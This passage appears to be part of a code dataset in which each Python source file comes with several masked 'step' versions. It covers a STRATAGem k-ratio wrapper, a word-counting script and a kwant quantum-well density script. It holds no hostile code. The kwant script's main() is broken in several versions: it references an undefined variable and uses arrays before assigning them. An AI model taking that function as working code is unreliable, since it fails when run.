k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2) # unit in nm\n\n if layer not in self._layers:\n raise ValueError(\"Unknown layer\")\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n\n # Compute\n low_ = c.c_double(thickness_low_m * 1e9)\n high_ = c.c_double(thickness_high_m * 1e9)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)',\n ilayer, thickness_low_m * 1e9, thickness_high_m * 1e9)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_):\n self._raise_error(\"Cannot compute k-ratio vs thickness\")\n\n # Fetch results\n thicknesses = []\n kratios = {}\n\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n\n if not 
self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error(\"Cannot get thickness\")\n thicknesses.append(thick_.value)\n\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error(\"Cannot get k-ratio\")\n kratios.setdefault(experiment, []).append(k_.value)\n\n return thicknesses, kratios\n\n @_check_key\n def compute_kratio_vs_energy(self, energy_high_eV, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the incident\n energy. \n Note that the computation also starts at 0 keV up to the specified energy.\n \n :arg energy_high_eV: upper limit of the thickness in electronvolts\n :type energy_high_eV: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of energies in electronvolts\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each energy\n \"\"\"\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n\n energy_ = c.c_double(energy_high_eV / 1e3)\n logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1e3,))\n self._lib.StSetMaxHV(energy_)\n\n # Compute\n logger.debug('StComputeKvsHV(key)')\n if not self._lib.StComputeKvsHV(self._key):\n self._raise_error(\"Cannot compute k-ratio vs energy\")\n\n # Fetch results\n energies = []\n kratios = {}\n\n k_ = c.c_double()\n bHV_ = c.c_bool(True)\n increment = float(energy_high_eV / 1e3) / step\n\n for i in range(step + 1):\n hv = i * increment\n hv_ = c.c_double(hv)\n\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n\n if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_, bHV_, c.byref(k_)):\n self._raise_error(\"Cannot get k-ratio\")\n\n kratios.setdefault(experiment, []).append(k_.value)\n\n energies.append(hv)\n\n return energies, kratios\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError(\"Thickness of layer %i is unknown\" % i)\n\n # Compute\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n\n _thicknesses, kratios = \\\n self.compute_kratio_vs_thickness(layer, thickness_low_m,\n thickness_high_m, step)\n\n # Reorganize results\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n\n return output\n\n @_check_key\n def _compute_kratios_substrate(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_energy`.\n \"\"\"\n output = {}\n\n step = 2\n for experiment in self._experiments:\n energy_high_eV = experiment.energy_eV\n\n _energies, 
kratios = \\\n self.compute_kratio_vs_energy(energy_high_eV, step)\n\n kratio = kratios[experiment][-1]\n if (kratio < 0): # Bug in strategem that some energy don't work\n logger.warn(\"STRATAGem returns a negative k-ratio, re-try with energy + 1 eV\")\n _energies, kratios = \\\n self.compute_kratio_vs_energy(energy_high_eV + 1.0, step)\n kratio = kratios[experiment][-1]\n\n output.setdefault(experiment, kratio)\n\n return output\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n # Add missing experiments\n zs = set(exp.z for exp in self._experiments.keys())\n\n for layer in list(self._layers.keys()) + [self._substrate[0]]:\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False) # dummy\n self.add_experiment(exp)\n\n # Set iteration maximum\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n\n # Compute\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error(\"Cannot start iteration\")\n\n continue_ = c.c_bool(True)\n iteration = 0\n\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n\n if not continue_.value:\n break\n\n logger.debug('Iteration completed')\n\n # Fetch results\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error(\"Cannot get number of elements\")\n\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_,\n flag_, wfs_):\n self._raise_error(\"Cannot get layer concentration\")\n\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n\n logger.debug(\"StSdGetThick(key, %i)\", ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(thick_known),\n c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error(\"Cannot get thickness\")\n\n return (composition, thickness.value / 1e10,\n mass_thickness.value * 10.0, density.value * 1e3)\n\n sample = Sample(get_layer(*self._substrate)[0])\n\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. 
If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n\n # Set scaling\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1e3)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1e3)\n self._lib.StSetScaleHV(maxhv_)\n\n # Compute\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n\n # Get values\n przs = {}\n\n for experiment, indexes in self._experiments.items():\n # Size of each bin\n if maxdepth_m is None:\n # Calculate max depth using Kanaya-Okayama\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1e3\n\n for z, fraction in self._substrate[0].composition.items():\n dr = (0.0276 * atomic_mass_kg_mol(z) * 1e3 * energy_keV ** 1.67) / \\\n (z ** 0.89 * mass_density_kg_m3(z) / 1e3)\n maxdepth_m += fraction / (dr * 1e-6)\n\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5 # safety factor\n\n increment_kg_m2 = (maxdepth_m * self._substrate[0].density_kg_m3) / bins\n\n # Indexes\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n\n rzs = []\n ys_generated = []\n ys_emitted = []\n\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n\n return przs\n\n",
"step-ids": [
21,
23,
38,
39,
40
]
}
|
[
21,
23,
38,
39,
40
] |
text=open('mytext.txt','w')
x=text.write("I like coding\nit is a new part\nof my life!!!")
text.close()  # close the file so the written text is flushed before it is read back
text=open('mytext.txt')
read=text.readlines()
i=0
counter=0
total=0
print("number of lines :"+str(len(read)))
while i<=len(read)-1:
    counter=counter+read[i].count('\n') + read[i].count(' ')  # every space or newline ends one word
    total+=len(read[i])-read[i].count('\n') - read[i].count(' ')  # characters that are not spaces or newlines
    i+=1
counter+=1  # the last word has no trailing separator, so count it here
print('Number of words is :'+str(counter))
print('total number of letters are :' +str(total))
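
# Optional cross-check (not part of the original counting logic): str.split() counts
# whitespace-separated words directly and should report the same 11 words for the
# sample text above.
check=open('mytext.txt')
print('split() word count :'+str(len(check.read().split())))
check.close()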
|
normal
|
{
"blob_id": "5ad8db85f4f705173cf5d0649af6039ebe1544b2",
"index": 7488,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('number of lines :' + str(len(read)))\nwhile i <= len(read) - 1:\n counter = counter + read[i].count('\\n') + read[i].count(' ')\n total += len(read[i]) - read[i].count('\\n') - read[i].count(' ')\n i += 1\ncounter += 1\nprint('Number of words is :' + str(counter))\nprint('total number of letters are :' + str(total))\n",
"step-3": "text = open('mytext.txt', 'w')\nx = text.write(\"\"\"I like coding\nit is a new part\nof my life!!!\"\"\")\ntext = open('mytext.txt')\nread = text.readlines()\ni = 0\ncounter = 0\ntotal = 0\nprint('number of lines :' + str(len(read)))\nwhile i <= len(read) - 1:\n counter = counter + read[i].count('\\n') + read[i].count(' ')\n total += len(read[i]) - read[i].count('\\n') - read[i].count(' ')\n i += 1\ncounter += 1\nprint('Number of words is :' + str(counter))\nprint('total number of letters are :' + str(total))\n",
"step-4": "text=open('mytext.txt','w')\nx=text.write(\"I like coding\\nit is a new part\\nof my life!!!\")\ntext=open('mytext.txt')\nread=text.readlines()\ni=0\ncounter=0\ntotal=0\nprint(\"number of lines :\"+str(len(read)))\n\nwhile i<=len(read)-1:\n counter=counter+read[i].count('\\n') + read[i].count(' ')\n total+=len(read[i])-read[i].count('\\n') - read[i].count(' ')\n i+=1\ncounter+=1\nprint('Number of words is :'+str(counter))\nprint('total number of letters are :' +str(total))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
'''
Script for analysis of wavefunctions on GaSb/InAs/GaSb symmetric quantum wells.
This piece of code is part of the project "phd_gasb_inas", which comprises the work
related to the PhD dissertation entitled "Quantum transport of charge and spin in
2D topological insulators".
Author: Marcos Medeiros
email: [email protected]
'''
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
# Kwant related stuff
import kwant
import tinyarray
# local application imports
from hamiltonians import gasb_hamiltonian as gasb
from system_geometry import shapes
from transport_tools import bands_and_currents as tools
def map_density(ax, syst, psi_sqrd, colormap = "Reds"):
# Plot the results:
# print(max(psi_sqrd))
kwant.plotter.map(syst, psi_sqrd, ax = ax, fig_size = (7,3), cmap = colormap, vmax = 0.99*max(psi_sqrd))
tools.edit_axis(ax,'dens')
return 0
def density_in_line(syst, states, Op = np.eye(6)):
y_stack = []
def line(site):
(x, y) = site.pos
half = 0
delta = shapes.A_STD
ans = abs(x - half) < delta
if ans == True : y_stack.append(y)
return ans
rho_line = kwant.operator.Density(syst, Op, where = line, sum = False)
dos_line = np.array([rho_line(p) for p in states])
return dos_line, np.array(y_stack)
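
# Note: with sum=False the density operator returns one value per site selected by
# `line`, so dos_line has shape (number of states, number of sites on the line) and
# y_stack holds the y coordinate of each of those sites.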
def plot_dos_in_line(dos_line):
fig, ax = plt.subplots(1, 2, figsize = (10,5))
ax[0].plot(dos_line[0], color = 'red')
ax[1].plot(dos_line[1], color = 'blue')
plt.tight_layout()
plt.show()
def normalize(dos_in_line):
# return sum(dos_in_line)
return sum(dos_in_line)/max(sum(dos_in_line))
def print_info_dos_line(y_values, dos_in_line):
print(80*"=")
print("Size of dos_both: ", dos_in_line.shape)
print("Size of y_both: ", y_values.shape)
print("y_both:\n", y_values)
def main():
# Define the system:
hamiltonian = gasb.hamiltonian_97_k_plus()
# hamiltonian = gasb.hamiltonian_97_down()
lead_ham = gasb.free_ham(6)
centralShape = shapes.Rect()
syst = gasb.system_builder(hamiltonian, lead_ham, centralShape)
# Calculate the wave_function:
energia = 448
parametros = gasb.params_97
parametros['Eta3'] = 0
parametros['Eta2'] = 0
parametros['eF'] = 60
parametros = dict(GammaLead = parametros["GammaC"], V = 100, **parametros )
wf = kwant.wave_function(syst, energy = energia, params = parametros)
modes_left = wf(0)
modes_right = wf(1)
# modes_total = np.vstack((wf(0), wf(1)))
# Calculate the density:
sigma_z = tinyarray.array([[1,0],[0,-1]])
spin_proj= np.kron(sigma_z, np.eye(3))
identity = np.eye(6)
rho = kwant.operator.Density(syst, spin_proj)
psi_left = sum(rho(p) for p in modes_left)
psi_right = sum(rho(p) for p in modes_right)
    # Calculate dos in a line
    # (the original call passed an undefined `psi`; the left scattering modes are
    # assumed to be the intended input, and the (dos, y) tuples returned by
    # density_in_line are unpacked so the y values are available for the plots below)
    dos_in_line_from_left, y_values_left = density_in_line(syst, modes_left)
    dos_in_line_from_right, y_values_right = density_in_line(syst, modes_right)
    dos_in_line_from_both, _ = density_in_line(syst, np.vstack((wf(0), wf(1))))
plt.plot(sum(dos_in_line_from_both))
plt.show()
# print(dos_in_line.shape)
# print(dos_in_line)
plot_dos_in_line(dos_in_line_from_left)
# plot_dos_in_line(dos_in_line_from_both)
print(sum(dos_in_line_from_both).shape)
# Plot the results:
colorRight = "seismic"
colorLeft = "seismic"
fig, ax = plt.subplots(2,2,figsize=(14,6))
    y_values_left = y_values_left * (shapes.A0 / 10) # lattice units to nm (assuming A0 is in angstroms)
    y_values_right = y_values_right * (shapes.A0 / 10) # lattice units to nm (assuming A0 is in angstroms)
min_line, max_line = -0.7 * shapes.L_STD, 0.7 * shapes.L_STD
map_density(ax[0][0], syst, psi_left, colormap = colorRight)
ax[0][0].vlines(0, min_line, max_line, linestyle = "--")
ax[0][0].set_title("left lead")
map_density(ax[1][0], syst, psi_right, colormap = colorLeft)
ax[1][0].vlines(0, min_line, max_line, linestyle = "--")
ax[1][0].set_title("right lead")
ax[0][1].plot(y_values_left, normalize(dos_in_line_from_left),
marker = ".", markersize = 2.5, linestyle = "-" )
ax[1][1].plot(y_values_right, normalize(dos_in_line_from_right),
marker = ".", markersize = 2.5, linestyle = "-" )
plt.tight_layout()
plt.show()
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "a012055d11202c68d9eddf5cf2a17043f9bbaf0a",
"index": 6851,
"step-1": "<mask token>\n\n\ndef map_density(ax, syst, psi_sqrd, colormap='Reds'):\n kwant.plotter.map(syst, psi_sqrd, ax=ax, fig_size=(7, 3), cmap=colormap,\n vmax=0.99 * max(psi_sqrd))\n tools.edit_axis(ax, 'dens')\n return 0\n\n\ndef density_in_line(syst, states, Op=np.eye(6)):\n y_stack = []\n\n def line(site):\n x, y = site.pos\n half = 0\n delta = shapes.A_STD\n ans = abs(x - half) < delta\n if ans == True:\n y_stack.append(y)\n return ans\n rho_line = kwant.operator.Density(syst, Op, where=line, sum=False)\n dos_line = np.array([rho_line(p) for p in states])\n return dos_line, np.array(y_stack)\n\n\ndef plot_dos_in_line(dos_line):\n fig, ax = plt.subplots(1, 2, figsize=(10, 5))\n ax[0].plot(dos_line[0], color='red')\n ax[1].plot(dos_line[1], color='blue')\n plt.tight_layout()\n plt.show()\n\n\n<mask token>\n\n\ndef print_info_dos_line(y_values, dos_in_line):\n print(80 * '=')\n print('Size of dos_both: ', dos_in_line.shape)\n print('Size of y_both: ', y_values.shape)\n print('y_both:\\n', y_values)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef map_density(ax, syst, psi_sqrd, colormap='Reds'):\n kwant.plotter.map(syst, psi_sqrd, ax=ax, fig_size=(7, 3), cmap=colormap,\n vmax=0.99 * max(psi_sqrd))\n tools.edit_axis(ax, 'dens')\n return 0\n\n\ndef density_in_line(syst, states, Op=np.eye(6)):\n y_stack = []\n\n def line(site):\n x, y = site.pos\n half = 0\n delta = shapes.A_STD\n ans = abs(x - half) < delta\n if ans == True:\n y_stack.append(y)\n return ans\n rho_line = kwant.operator.Density(syst, Op, where=line, sum=False)\n dos_line = np.array([rho_line(p) for p in states])\n return dos_line, np.array(y_stack)\n\n\ndef plot_dos_in_line(dos_line):\n fig, ax = plt.subplots(1, 2, figsize=(10, 5))\n ax[0].plot(dos_line[0], color='red')\n ax[1].plot(dos_line[1], color='blue')\n plt.tight_layout()\n plt.show()\n\n\n<mask token>\n\n\ndef print_info_dos_line(y_values, dos_in_line):\n print(80 * '=')\n print('Size of dos_both: ', dos_in_line.shape)\n print('Size of y_both: ', y_values.shape)\n print('y_both:\\n', y_values)\n\n\ndef main():\n hamiltonian = gasb.hamiltonian_97_k_plus()\n lead_ham = gasb.free_ham(6)\n centralShape = shapes.Rect()\n syst = gasb.system_builder(hamiltonian, lead_ham, centralShape)\n energia = 448\n parametros = gasb.params_97\n parametros['Eta3'] = 0\n parametros['Eta2'] = 0\n parametros['eF'] = 60\n parametros = dict(GammaLead=parametros['GammaC'], V=100, **parametros)\n wf = kwant.wave_function(syst, energy=energia, params=parametros)\n modes_left = wf(0)\n modes_right = wf(1)\n sigma_z = tinyarray.array([[1, 0], [0, -1]])\n spin_proj = np.kron(sigma_z, np.eye(3))\n identity = np.eye(6)\n rho = kwant.operator.Density(syst, spin_proj)\n psi_left = sum(rho(p) for p in modes_left)\n psi_right = sum(rho(p) for p in modes_right)\n dos_in_line_from_left = density_in_line(syst, psi)\n dos_in_line_from_both = density_in_line(syst, np.vstack((wf(0), wf(1))))\n plt.plot(sum(dos_in_line_from_both))\n plt.show()\n plot_dos_in_line(dos_in_line_from_left)\n print(sum(dos_in_line_from_both).shape)\n colorRight = 'seismic'\n colorLeft = 'seismic'\n fig, ax = plt.subplots(2, 2, figsize=(14, 6))\n y_values_left = y_values_left * (shapes.A0 / 10)\n y_values_right = y_values_right * (shapes.A0 / 10)\n min_line, max_line = -0.7 * shapes.L_STD, 0.7 * shapes.L_STD\n map_density(ax[0][0], syst, psi_left, colormap=colorRight)\n ax[0][0].vlines(0, min_line, max_line, linestyle='--')\n ax[0][0].set_title('left lead')\n map_density(ax[1][0], syst, psi_right, colormap=colorLeft)\n ax[1][0].vlines(0, min_line, max_line, linestyle='--')\n ax[1][0].set_title('right lead')\n ax[0][1].plot(y_values_left, normalize(dos_in_line_from_left), marker=\n '.', markersize=2.5, linestyle='-')\n ax[1][1].plot(y_values_right, normalize(dos_in_line_from_right), marker\n ='.', markersize=2.5, linestyle='-')\n plt.tight_layout()\n plt.show()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef map_density(ax, syst, psi_sqrd, colormap='Reds'):\n kwant.plotter.map(syst, psi_sqrd, ax=ax, fig_size=(7, 3), cmap=colormap,\n vmax=0.99 * max(psi_sqrd))\n tools.edit_axis(ax, 'dens')\n return 0\n\n\ndef density_in_line(syst, states, Op=np.eye(6)):\n y_stack = []\n\n def line(site):\n x, y = site.pos\n half = 0\n delta = shapes.A_STD\n ans = abs(x - half) < delta\n if ans == True:\n y_stack.append(y)\n return ans\n rho_line = kwant.operator.Density(syst, Op, where=line, sum=False)\n dos_line = np.array([rho_line(p) for p in states])\n return dos_line, np.array(y_stack)\n\n\ndef plot_dos_in_line(dos_line):\n fig, ax = plt.subplots(1, 2, figsize=(10, 5))\n ax[0].plot(dos_line[0], color='red')\n ax[1].plot(dos_line[1], color='blue')\n plt.tight_layout()\n plt.show()\n\n\ndef normalize(dos_in_line):\n return sum(dos_in_line) / max(sum(dos_in_line))\n\n\ndef print_info_dos_line(y_values, dos_in_line):\n print(80 * '=')\n print('Size of dos_both: ', dos_in_line.shape)\n print('Size of y_both: ', y_values.shape)\n print('y_both:\\n', y_values)\n\n\ndef main():\n hamiltonian = gasb.hamiltonian_97_k_plus()\n lead_ham = gasb.free_ham(6)\n centralShape = shapes.Rect()\n syst = gasb.system_builder(hamiltonian, lead_ham, centralShape)\n energia = 448\n parametros = gasb.params_97\n parametros['Eta3'] = 0\n parametros['Eta2'] = 0\n parametros['eF'] = 60\n parametros = dict(GammaLead=parametros['GammaC'], V=100, **parametros)\n wf = kwant.wave_function(syst, energy=energia, params=parametros)\n modes_left = wf(0)\n modes_right = wf(1)\n sigma_z = tinyarray.array([[1, 0], [0, -1]])\n spin_proj = np.kron(sigma_z, np.eye(3))\n identity = np.eye(6)\n rho = kwant.operator.Density(syst, spin_proj)\n psi_left = sum(rho(p) for p in modes_left)\n psi_right = sum(rho(p) for p in modes_right)\n dos_in_line_from_left = density_in_line(syst, psi)\n dos_in_line_from_both = density_in_line(syst, np.vstack((wf(0), wf(1))))\n plt.plot(sum(dos_in_line_from_both))\n plt.show()\n plot_dos_in_line(dos_in_line_from_left)\n print(sum(dos_in_line_from_both).shape)\n colorRight = 'seismic'\n colorLeft = 'seismic'\n fig, ax = plt.subplots(2, 2, figsize=(14, 6))\n y_values_left = y_values_left * (shapes.A0 / 10)\n y_values_right = y_values_right * (shapes.A0 / 10)\n min_line, max_line = -0.7 * shapes.L_STD, 0.7 * shapes.L_STD\n map_density(ax[0][0], syst, psi_left, colormap=colorRight)\n ax[0][0].vlines(0, min_line, max_line, linestyle='--')\n ax[0][0].set_title('left lead')\n map_density(ax[1][0], syst, psi_right, colormap=colorLeft)\n ax[1][0].vlines(0, min_line, max_line, linestyle='--')\n ax[1][0].set_title('right lead')\n ax[0][1].plot(y_values_left, normalize(dos_in_line_from_left), marker=\n '.', markersize=2.5, linestyle='-')\n ax[1][1].plot(y_values_right, normalize(dos_in_line_from_right), marker\n ='.', markersize=2.5, linestyle='-')\n plt.tight_layout()\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport kwant\nimport tinyarray\nfrom hamiltonians import gasb_hamiltonian as gasb\nfrom system_geometry import shapes\nfrom transport_tools import bands_and_currents as tools\n\n\ndef map_density(ax, syst, psi_sqrd, colormap='Reds'):\n kwant.plotter.map(syst, psi_sqrd, ax=ax, fig_size=(7, 3), cmap=colormap,\n vmax=0.99 * max(psi_sqrd))\n tools.edit_axis(ax, 'dens')\n return 0\n\n\ndef density_in_line(syst, states, Op=np.eye(6)):\n y_stack = []\n\n def line(site):\n x, y = site.pos\n half = 0\n delta = shapes.A_STD\n ans = abs(x - half) < delta\n if ans == True:\n y_stack.append(y)\n return ans\n rho_line = kwant.operator.Density(syst, Op, where=line, sum=False)\n dos_line = np.array([rho_line(p) for p in states])\n return dos_line, np.array(y_stack)\n\n\ndef plot_dos_in_line(dos_line):\n fig, ax = plt.subplots(1, 2, figsize=(10, 5))\n ax[0].plot(dos_line[0], color='red')\n ax[1].plot(dos_line[1], color='blue')\n plt.tight_layout()\n plt.show()\n\n\ndef normalize(dos_in_line):\n return sum(dos_in_line) / max(sum(dos_in_line))\n\n\ndef print_info_dos_line(y_values, dos_in_line):\n print(80 * '=')\n print('Size of dos_both: ', dos_in_line.shape)\n print('Size of y_both: ', y_values.shape)\n print('y_both:\\n', y_values)\n\n\ndef main():\n hamiltonian = gasb.hamiltonian_97_k_plus()\n lead_ham = gasb.free_ham(6)\n centralShape = shapes.Rect()\n syst = gasb.system_builder(hamiltonian, lead_ham, centralShape)\n energia = 448\n parametros = gasb.params_97\n parametros['Eta3'] = 0\n parametros['Eta2'] = 0\n parametros['eF'] = 60\n parametros = dict(GammaLead=parametros['GammaC'], V=100, **parametros)\n wf = kwant.wave_function(syst, energy=energia, params=parametros)\n modes_left = wf(0)\n modes_right = wf(1)\n sigma_z = tinyarray.array([[1, 0], [0, -1]])\n spin_proj = np.kron(sigma_z, np.eye(3))\n identity = np.eye(6)\n rho = kwant.operator.Density(syst, spin_proj)\n psi_left = sum(rho(p) for p in modes_left)\n psi_right = sum(rho(p) for p in modes_right)\n dos_in_line_from_left = density_in_line(syst, psi)\n dos_in_line_from_both = density_in_line(syst, np.vstack((wf(0), wf(1))))\n plt.plot(sum(dos_in_line_from_both))\n plt.show()\n plot_dos_in_line(dos_in_line_from_left)\n print(sum(dos_in_line_from_both).shape)\n colorRight = 'seismic'\n colorLeft = 'seismic'\n fig, ax = plt.subplots(2, 2, figsize=(14, 6))\n y_values_left = y_values_left * (shapes.A0 / 10)\n y_values_right = y_values_right * (shapes.A0 / 10)\n min_line, max_line = -0.7 * shapes.L_STD, 0.7 * shapes.L_STD\n map_density(ax[0][0], syst, psi_left, colormap=colorRight)\n ax[0][0].vlines(0, min_line, max_line, linestyle='--')\n ax[0][0].set_title('left lead')\n map_density(ax[1][0], syst, psi_right, colormap=colorLeft)\n ax[1][0].vlines(0, min_line, max_line, linestyle='--')\n ax[1][0].set_title('right lead')\n ax[0][1].plot(y_values_left, normalize(dos_in_line_from_left), marker=\n '.', markersize=2.5, linestyle='-')\n ax[1][1].plot(y_values_right, normalize(dos_in_line_from_right), marker\n ='.', markersize=2.5, linestyle='-')\n plt.tight_layout()\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python\n'''\nScript for analysis of wavefunctions on GaSb/InAs/GaSb simmetric quantum wells.\n\nThis piece code is part of the project \"phd_gasb_inas\", which comprises the work\nrelated to the Phd. Dissertation named: \"Quantum transport of charge and spin in\ntopological insulators 2D\".\n\nAuthor: Marcos Medeiros\nemail: [email protected]\n'''\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n# Kwant related stuff\nimport kwant\nimport tinyarray\n\n# local application imports\nfrom hamiltonians import gasb_hamiltonian as gasb\nfrom system_geometry import shapes\nfrom transport_tools import bands_and_currents as tools\n\n\ndef map_density(ax, syst, psi_sqrd, colormap = \"Reds\"):\n # Plot the results:\n # print(max(psi_sqrd))\n kwant.plotter.map(syst, psi_sqrd, ax = ax, fig_size = (7,3), cmap = colormap, vmax = 0.99*max(psi_sqrd))\n tools.edit_axis(ax,'dens')\n return 0\n\ndef density_in_line(syst, states, Op = np.eye(6)):\n y_stack = []\n def line(site):\n (x, y) = site.pos\n half = 0\n delta = shapes.A_STD\n ans = abs(x - half) < delta\n if ans == True : y_stack.append(y)\n return ans\n\n rho_line = kwant.operator.Density(syst, Op, where = line, sum = False)\n dos_line = np.array([rho_line(p) for p in states])\n return dos_line, np.array(y_stack)\n\ndef plot_dos_in_line(dos_line):\n fig, ax = plt.subplots(1, 2, figsize = (10,5))\n ax[0].plot(dos_line[0], color = 'red')\n ax[1].plot(dos_line[1], color = 'blue')\n plt.tight_layout()\n plt.show()\n\ndef normalize(dos_in_line):\n # return sum(dos_in_line)\n return sum(dos_in_line)/max(sum(dos_in_line))\n\ndef print_info_dos_line(y_values, dos_in_line):\n print(80*\"=\")\n print(\"Size of dos_both: \", dos_in_line.shape)\n print(\"Size of y_both: \", y_values.shape)\n print(\"y_both:\\n\", y_values)\n\n\n\ndef main():\n # Define the system:\n hamiltonian = gasb.hamiltonian_97_k_plus()\n # hamiltonian = gasb.hamiltonian_97_down()\n lead_ham = gasb.free_ham(6)\n centralShape = shapes.Rect()\n syst = gasb.system_builder(hamiltonian, lead_ham, centralShape)\n\n\n # Calculate the wave_function:\n energia = 448\n parametros = gasb.params_97\n parametros['Eta3'] = 0\n parametros['Eta2'] = 0\n parametros['eF'] = 60\n parametros = 